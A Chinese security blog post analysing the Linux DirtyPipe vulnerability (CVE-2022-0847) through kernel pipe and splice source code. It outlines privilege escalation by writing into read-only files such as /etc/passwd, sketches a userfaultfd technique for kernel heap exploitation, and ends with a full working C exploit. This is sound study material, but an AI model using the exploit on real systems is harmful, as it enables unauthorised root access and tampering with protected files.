CVE-2022-0847 DirtyPipe漏洞分析及其延申利用手法研究

0rb1t Lv2

0x00.前言

接触这个cve还是因为SCTF 2024中的一道kernel-pwn题:kno_puts_revenge,其中只给了一次的0x400堆的uaf机会,且仅泄露了堆地址。看了各路大佬的wp,可以说是利用手法多种多样,有直接打CVE-2022-26816的,也有打msg_msg的。最令我印象深刻的是利用DirtyPipe修改poweroff文件实现提权的,前面我只知道利用pipe_buffer打fops劫持,没想到居然还有0泄露如此美妙的打法,让我忍不住去分析这个打法的来源,并记录下来。

0x01.源码分析

本篇源码使用的是linux-5.15.1,且本段着重介绍pipe创建管道以及splice进行数据传输的流程,内容较为繁琐,可选择性跳过。

pipe

pipe(管道)是一种基本ipc机制,可用于进程间通信,传输数据,且管道的传输是单向的。它可以将一个进程的输出连接到另一个进程的输入,和linux的管道符如出一辙,或者说两者就是同一个东西。

用户层可通过pipe系统调用创建两个管道(读管道和写管道)或者pipe2来设置flags。

1
2
3
4
5
6
7
8
SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}
SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}

跟进到do_pipe2可以看到,其会调用__do_pipe_flags返回读管道和写管道的文件描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;

error = __do_pipe_flags(fd, files, flags);
if (!error) {
//如果返回给用户异常,就把文件关闭并销毁文件描述符
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
//绑定文件和文件描述符
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}

__do_pipe_flags函数会检查flags是否在设置的类型范围内,然后调用create_pipe_files创建两个pipe文件,并返回两个文件描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
static int __do_pipe_flags(int *fd, struct file **files, int flags)
{
int error;
int fdw, fdr;
//检查flags是否在范围内
if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
return -EINVAL;

error = create_pipe_files(files, flags);
if (error)
return error;

error = get_unused_fd_flags(flags);
if (error < 0)
goto err_read_pipe;
fdr = error;

error = get_unused_fd_flags(flags);
if (error < 0)
goto err_fdr;
fdw = error;

audit_fd_pair(fdr, fdw);
fd[0] = fdr;
fd[1] = fdw;
return 0;

err_fdr:
put_unused_fd(fdr);
err_read_pipe:
fput(files[0]);
fput(files[1]);
return error;
}

跟进create_pipe_files函数,通过get_pipe_inode获取管道对应的inode。

inode (index node)是指在许多“类Unix文件系统”中的一种数据结构,用于描述文件系统对象(包括文件、目录、设备文件、socket、管道等)。每个inode保存了文件系统对象数据的属性和磁盘块位置。 文件系统对象属性包含了各种元数据(如:最后修改时间) ,也包含用户组(owner)和权限数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
int create_pipe_files(struct file **res, int flags)
{
//获取管道inode
struct inode *inode = get_pipe_inode();
struct file *f;
int error;
...
//创建可写文件,并初始化fops、dentry一些成员。
f = alloc_file_pseudo(inode, pipe_mnt, "",
O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
&pipefifo_fops);
if (IS_ERR(f)) {
free_pipe_info(inode->i_pipe);
iput(inode);
return PTR_ERR(f);
}
//设置file对应的pipe。
f->private_data = inode->i_pipe;
//克隆一份可读文件。
res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
&pipefifo_fops);
if (IS_ERR(res[0])) {
put_pipe_info(inode, inode->i_pipe);
fput(f);
return PTR_ERR(res[0]);
}
//读文件和写文件都设置的同一个pipe。
res[0]->private_data = inode->i_pipe;
res[1] = f;
stream_open(inode, res[0]);
stream_open(inode, res[1]);
return 0;
}

get_pipe_inode调用alloc_pipe_info创建pipe结构体,并给其设置fops。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static struct inode * get_pipe_inode(void)
{

struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;
...
pipe = alloc_pipe_info();
//设置inode装载pipe
inode->i_pipe = pipe;
//设置使用pipe的文件数量
pipe->files = 2;
//设置一个读者和一个写者
pipe->readers = pipe->writers = 1;
inode->i_fop = &pipefifo_fops;
...
}

alloc_pipe_info会申请一个pipe结构体,并为其bufs成员申请一个0x400大小的堆来存储16个pipe_buffer组成的循环表。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
struct pipe_buffer {
struct page *page;//每个pipe_buffer都掌管一个页
unsigned int offset, len;//offset表示读写的偏移位置,len表示已经读写的长度
const struct pipe_buf_operations *ops;//fops可以劫持
unsigned int flags;
unsigned long private;
};

struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;//0x10
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);//0x10*0x1000
//创建0x100的堆,结构体劫持可尝试利用
pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;
//一般没问题
if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;
//user->pipe_bufs += pipe_bufs,user_bufs = user->pipe_bufs;
user_bufs = account_pipe_buffers(user, 0, pipe_bufs);
//非特权用户的pipe_buffers上限0x10*0x400
if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
user_bufs = account_pipe_buffers(user, pipe_bufs, PIPE_MIN_DEF_BUFFERS);
pipe_bufs = PIPE_MIN_DEF_BUFFERS;
}
//特权用户也有上限
if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
goto out_revert_acct;
//一般为0x400的堆,堆劫持可以利用
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}

out_revert_acct:
//user->pipe_bufs-=pipe_bufs
(void) account_pipe_buffers(user, pipe_bufs, 0);
kfree(pipe);
out_free_uid:
free_uid(user);
return NULL;
}

以上便是pipe的申请过程,可以看出来创建管道实则就是创建一个虚拟文件,往管道中写入和读取数据,实际就是往文件中读写,只是数据读取和写入都只发生到pipe_buffers也就是文件缓冲区,不会实际存入到硬盘文件中,在管道关闭后文件也不会保存。

pipe的fops如下

1
2
3
4
5
6
7
8
9
10
11
const struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};

当我们调用write往pipe中写入数据时会调用pipe_write函数处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;
/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;

__pipe_lock(pipe);
//没有读者就直接退出,默认创建都有一个读者和一个写者
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}
...
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
//判断缓冲区不为空
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
//取最新写过的buf
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;
//判断buf是否支持merge操作且大小合适,如果可以就直接接着这个buf末尾写入内容。
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
//一般劫持可以利用这里劫持rip,通常情况下confirm为空
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
//写入
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}

for (;;) {
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}

head = pipe->head;
//循环列表没满就添加新buf
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

spin_lock_irq(&pipe->rd_wait.lock);

head = pipe->head;
//满了就接着循环等待空位
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);

/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
//当filp->flags&O_DIRECT==0时即可设置为PIPE_BUF_FLAG_CAN_MERGE
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;
//循环写入
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;

if (!iov_iter_count(from))
break;
}

if (!pipe_full(head, pipe->tail, pipe->max_usage))
continue;

/* Wait for buffer space to become available. */
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}

/*
* We're going to release the pipe lock and wait for more
* space. We wake up any readers if necessary, and then
* after waiting we need to re-check whether the pipe
* become empty while we dropped the lock.
*/
__pipe_unlock(pipe);
...
return ret;
}

可以知道当head_buf的flag设置为PIPE_BUF_FLAG_CAN_MERGE是可以接着该buf末尾写入数据的。

splice

当我们想要将一个文件中的内容传输到另一个文件中时,总需要先通过read将该文件的内容读取至内核空间再转入用户空间,然后通过write将其从用户空间复制到内核空间最终写入另一个文件中。

这样需要在内核和用户间进行大量的数据传输,效率非常低,所以开发者开发了splice功能,让数据只需要在内核空间传输即可实现文件之间内容的输送。

splice系统调用如下,获取fd结构体并调用__do_splice进行后续处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
int, fd_out, loff_t __user *, off_out,
size_t, len, unsigned int, flags)
{
struct fd in, out;
long error;

if (unlikely(!len))
return 0;

if (unlikely(flags & ~SPLICE_F_ALL))
return -EINVAL;

error = -EBADF;
in = fdget(fd_in);
if (in.file) {
out = fdget(fd_out);
if (out.file) {
error = __do_splice(in.file, off_in, out.file, off_out,
len, flags);
fdput(out);
}
fdput(in);
}
return error;
}

__do_splice函数会获取infile和outfile的管道信息以及文件偏移,并调用do_splice处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
static long __do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset, *__off_in = NULL, *__off_out = NULL;
long ret;
//get_pipe_info函数会检查fops是否为pipe的fops,如果不是则返回NULL
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
//管道不使用偏移,这里进行了传入参数的严格限制
if (ipipe && off_in)
return -ESPIPE;
if (opipe && off_out)
return -ESPIPE;

if (off_out) {
if (copy_from_user(&offset, off_out, sizeof(loff_t)))
return -EFAULT;
__off_out = &offset;
}
if (off_in) {
if (copy_from_user(&offset, off_in, sizeof(loff_t)))
return -EFAULT;
__off_in = &offset;
}

ret = do_splice(in, __off_in, out, __off_out, len, flags);
...
return ret;
}

do_splice则根据传输类型选择处理函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
long do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;
//保证可读和可写属性
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;

ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
//两个file都是管道,进行管道和管道的传输
if (ipipe && opipe) {
if (off_in || off_out)
return -ESPIPE;

/* Splicing to self would be fun, but... */
if (ipipe == opipe)
return -EINVAL;

if ((in->f_flags | out->f_flags) & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
return splice_pipe_to_pipe(ipipe, opipe, len, flags);
}
//管道到文件的运输
if (ipipe) {
if (off_in)
return -ESPIPE;
if (off_out) {
//输出文件不能是管道
if (!(out->f_mode & FMODE_PWRITE))
return -EINVAL;
offset = *off_out;
} else {
offset = out->f_pos;
}
//在文件末尾添加内容
if (unlikely(out->f_flags & O_APPEND))
return -EINVAL;
//offset+len的范围检查
ret = rw_verify_area(WRITE, out, &offset, len);
if (unlikely(ret < 0))
return ret;

if (in->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

file_start_write(out);
//将管道内容写入文件
ret = do_splice_from(ipipe, out, &offset, len, flags);
file_end_write(out);

if (!off_out)
out->f_pos = offset;
else
*off_out = offset;

return ret;
}
//文件到管道的运输
if (opipe) {
if (off_out)
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
offset = *off_in;
} else {
offset = in->f_pos;
}

if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
if (!off_in)
in->f_pos = offset;
else
*off_in = offset;

return ret;
}

return -EINVAL;
}

我们重点关注文件到管道的运输,splice_file_to_pipe函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
long splice_file_to_pipe(struct file *in,
struct pipe_inode_info *opipe,
loff_t *offset,
size_t len, unsigned int flags)
{
long ret;

pipe_lock(opipe);
ret = wait_for_space(opipe, flags);
if (!ret)
ret = do_splice_to(in, offset, opipe, len, flags);
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
return ret;
}

跟进do_splice_to

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static long do_splice_to(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
unsigned int p_space;
int ret;
//又一次的读检查
if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;

/* Don't try to read more the pipe has space for. */
//保证len不超过pipe的剩余空间大小
p_space = pipe->max_usage - pipe_occupancy(pipe->head, pipe->tail);
len = min_t(size_t, len, p_space << PAGE_SHIFT);

ret = rw_verify_area(READ, in, ppos, len);
if (unlikely(ret < 0))
return ret;

if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;
//对于ext4文件调用的就是ext4_file_read_iter
if (unlikely(!in->f_op->splice_read))
return warn_unsupported(in, "read");
return in->f_op->splice_read(in, ppos, pipe, len, flags);
}

ext4_file_read_iter

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
struct inode *inode = file_inode(iocb->ki_filp);

if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
return -EIO;

if (!iov_iter_count(to))
return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
if (IS_DAX(inode))
return ext4_dax_read_iter(iocb, to);
#endif
//一般ki_flags&IOCB_DIRECT==0
if (iocb->ki_flags & IOCB_DIRECT)
return ext4_dio_read_iter(iocb, to);

return generic_file_read_iter(iocb, to);
}

generic_file_read_iter函数则直接调用filemap_read函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
ssize_t already_read)
{
struct file *filp = iocb->ki_filp;
struct file_ra_state *ra = &filp->f_ra;
struct address_space *mapping = filp->f_mapping;
struct inode *inode = mapping->host;
struct pagevec pvec;
int i, error = 0;
bool writably_mapped;
loff_t isize, end_offset;
...

do {
cond_resched();
//读取最多15个page
error = filemap_get_pages(iocb, iter, &pvec);
if (error < 0)
break;

...

for (i = 0; i < pagevec_count(&pvec); i++) {
struct page *page = pvec.pages[i];
size_t page_size = thp_size(page);
size_t offset = iocb->ki_pos & (page_size - 1);
size_t bytes = min_t(loff_t, end_offset - iocb->ki_pos,
page_size - offset);
size_t copied;
...
//关键位置
copied = copy_page_to_iter(page, offset, bytes, iter);

already_read += copied;
iocb->ki_pos += copied;
ra->prev_pos = iocb->ki_pos;

if (copied < bytes) {
error = -EFAULT;
break;
}
}
put_pages:
//放回
for (i = 0; i < pagevec_count(&pvec); i++)
put_page(pvec.pages[i]);
pagevec_reinit(&pvec);
//循环取出,这里的iter->count由copy_page_to_iter_pipe函数修改
} while (iov_iter_count(iter) && iocb->ki_pos < isize && !error);

file_accessed(filp);

return already_read ? already_read : error;
}

其中filemap_get_pages->filemap_get_read_batch对filemap进行遍历,取出n个page并返回,这里采用的零拷贝技术,只将page指针传过来,并引用计数加一。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static void filemap_get_read_batch(struct address_space *mapping,
pgoff_t index, pgoff_t max, struct pagevec *pvec)
{
XA_STATE(xas, &mapping->i_pages, index);
struct page *head;

rcu_read_lock();
//循环取出page链表中的每一个符合要求的page
for (head = xas_load(&xas); head; head = xas_next(&xas)) {
if (xas_retry(&xas, head))
continue;
if (xas.xa_index > max || xa_is_value(head))
break;
//增加page的refcount,防止被释放
if (!page_cache_get_speculative(head))
goto retry;

/* Has the page moved or been split? */
if (unlikely(head != xas_reload(&xas)))//防止在取出的时候page发生了修改,二次确认
goto put_page;
//往pvec中放入page
if (!pagevec_add(pvec, head))
break;
if (!PageUptodate(head))//更新page状态
break;
if (PageReadahead(head))
break;
xas.xa_index = head->index + thp_nr_pages(head) - 1;
xas.xa_offset = (xas.xa_index >> xas.xa_shift) & XA_CHUNK_MASK;
continue;
put_page://释放
put_page(head);
retry:
xas_reset(&xas);
}
rcu_read_unlock();
}

当iter为管道类型时,copy_page_to_iter函数会调用copy_page_to_iter_pipe函数进行处理。

可以看到copy_page_to_iter_pipe函数是直接将page指针传给pipe_buffer的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;
...
off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
//可以看到也是直接传的page指针回去。
buf->page = page;
buf->offset = offset;
buf->len = bytes;
//buf->flags未初始化
pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
//修改iter->count
i->count -= bytes;
return bytes;
}

综上,splice系统调用的主要作用就是进行pipe与文件直接的传输,当从文件传输数据到pipe时,是基于零拷贝实现的,直接将文件的page传输给pipe,然后将page的引用计数+1,而pipe对page的操作是基于buf->flags参数的,倘若buf->flags参数为之前分析的PIPE_BUF_FLAG_CAN_MERGE,就可以往page中写内容。

0x02.漏洞原理

根据前面的源码分析,我们大致了解了pipe以及slice的功能。

我们可以看到,在copy_page_to_iter_pipe函数中,buf->flags并未进行初始化。

所以如果我们能喷射大量的相同大小堆块,在buf->flags位置设置成PIPE_BUF_FLAG_CAN_MERGE,并将堆块释放。

当调用pipe创建pipe_buffers时,buf->flags参数会默认为PIPE_BUF_FLAG_CAN_MERGE,从而我们再次调用splice_file_to_pipe触发copy_page_to_iter_pipe将只读文件的page传给pipe,此时pipe的buff->flags仍未初始化。

由于内核在实现对只读文件的映射时,并不会将映射的page设置成只读权限,所以我们可以利用pipe往page中写入数据从而修改文件内容。

0x03.漏洞利用

知道了原理,利用起来就很简单了。

Function.1

Step.1

喷射n个同样大小的堆块,修改其每个buf的flags标志为PIPE_BUF_FLAG_CAN_MERGE,再全部释放。

Step.2

创建一个新pipe,并打开一个特权只读文件。

Step.3

调用splice,将文件数据传给pipe。

Step.4

往pipe中写入数据,然后关闭pipe和文件。

由此特权文件成功被写入数据,我们可以修改/etc/passwd实现提权。

Function.2

看了别的佬的利用发现其实可以不喷射完成利用。

Step.1

创建一个pipe,打开一个特权只读文件。

Step.2

往pipe中写满数据,此时所有的pipe_buffer的flags位都设置为PIPE_BUF_FLAG_CAN_MERGE,再将pipe所有数据都读出来,这样天然情况下所有的pipe_buffer->flags就全部置位完成了。

剩下步骤就是和Function.1一样了。

0x04.延申利用手法

当该漏洞修复后,我们就没法直接利用了。

但是漏洞的修复只是将buff->flags进行了初始化,其他地方并没有修改,当程序存在0x400大小堆uaf或者溢出时,我们仍然可以利用这种手法进行提权。

溢出和直接uaf可能需要先泄露page指针以及fops结构体指针,倘若是利用userfaultfd机制构造的uaf,就可以做到零泄露攻击。

具体实现手法如下:

  1. 先mmap申请两个连续的0x1000的内存,并让addr2在uffd_buf_hack前面,此时只初始化addr2+0xff0(即uffd_buf_hack-0x10)的数据,uffd_buf_hack仍然是缺页的。
    image-20241011140602169

  2. 倘若我们想要在0x28的偏移处写入1个字节的数据,就可以在write时设置buf为uffd_buf_hack-0x28

    image-20241011140935379

  3. 之后内核在执行copy_from_user时,前面0x28个字节都是正常拷贝的,当到了0x29字节时,试图从uffd_buf_hack拷贝数据,从而触发缺页异常,然后我们free掉原有堆块,pipe申请新堆块,此时继续缺页拷贝,就会只覆盖0x28偏移的数据。

0x05.验证poc

直接抄arttnba3✌的poc了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
/*
* POC of CVE-2022-0847
* written by arttnba3
*/

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

void errExit(char * msg)
{
printf("\033[31m\033[1m[x] Error : \033[0m%s\n", msg);
exit(EXIT_FAILURE);
}

int main(int argc, char **argv, char **envp)
{
long page_size;
size_t offset_in_file;
size_t data_size;
int target_file_fd;
struct stat target_file_stat;
int pipe_fd[2];
int pipe_size;
char *buffer;
int retval;

// checking before we start to exploit
if (argc < 4)
{
puts("[*] Usage: ./exp target_file offset_in_file data");
exit(EXIT_FAILURE);
}

page_size = sysconf(_SC_PAGE_SIZE);
offset_in_file = strtoul(argv[2], NULL, 0);
if (offset_in_file % page_size == 0)
errExit("Cannot write on the boundary of a page!");

target_file_fd = open(argv[1], O_RDONLY);
if (target_file_fd < 0)
errExit("Failed to open the target file!");

if (fstat(target_file_fd, &target_file_stat))
errExit("Failed to get the info of the target file!");

if (offset_in_file > target_file_stat.st_size)
errExit("Offset is not in the file!");

data_size = strlen(argv[3]);
if ((offset_in_file + data_size) > target_file_stat.st_size)
errExit("Cannot enlarge the file!");

if (((offset_in_file % page_size) + data_size) > page_size)
errExit("Cannot write accross a page!");

// exploit now...
puts("\033[34m\033[1m[*] Start exploiting...\033[0m");

/*
* prepare the pipe, make every pipe_buffer a MERGE flag
* Just write and read through
*/
puts("\033[34m\033[1m[*] Setting the PIPE_BUF_FLAG_CAN_MERGE for each buffer in pipe.\033[0m");
pipe(pipe_fd);
pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ);
buffer = (char*) malloc(page_size);

for (int size_left = pipe_size; size_left > 0; )
{
int per_write = size_left > page_size ? page_size : size_left;
size_left -= write(pipe_fd[1], buffer, per_write);
}

for (int size_left = pipe_size; size_left > 0; )
{
int per_read = size_left > page_size ? page_size : size_left;
size_left -= read(pipe_fd[0], buffer, per_read);
}

puts("\033[32m\033[1m[+] Flag setting has been done.\033[0m");

/*
* Use the splice to make the pipe_buffer->page
* become the page of the file mapped, by read
* a byte from the file accross the splice
*/
puts("\033[34m\033[1m[*] Reading a byte from the file by splice.\033[0m");
offset_in_file--; // we read a byte, so offset should minus 1
retval = splice(target_file_fd, &offset_in_file, pipe_fd[1], NULL, 1, 0);
if (retval < 0)
errExit("splice failed!");
else if (retval == 0)
errExit("short splice!");
puts("\033[32m\033[1m[+] File splice done.\033[0m");

/*
* Now it comes to the time of exploit:
* the mapped page of file has been in pipe_buffer,
* and the PIPE_BUF_FLAG_CAN_MERGE is still set,
* just a simple write can make the exploit.
*/
retval = write(pipe_fd[1], argv[3], data_size);
if (retval < 0)
errExit("Write failed!");
else if (retval < data_size)
errExit("Short write!");

puts("\033[32m\033[1m[+] EXPLOIT DONE!\033[0m");
}

d2dedf15136433e9fd1ea4ca237e5be

  • Title: CVE-2022-0847 DirtyPipe漏洞分析及其延申利用手法研究
  • Author: 0rb1t
  • Created at : 2024-10-04 18:06:13
  • Updated at : 2024-11-19 22:17:20
  • Link: https://redefine.ohevan.com/2024/10/04/CVE-2022-0847-DirtyPipe漏洞分析及其延申利用手法研究/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments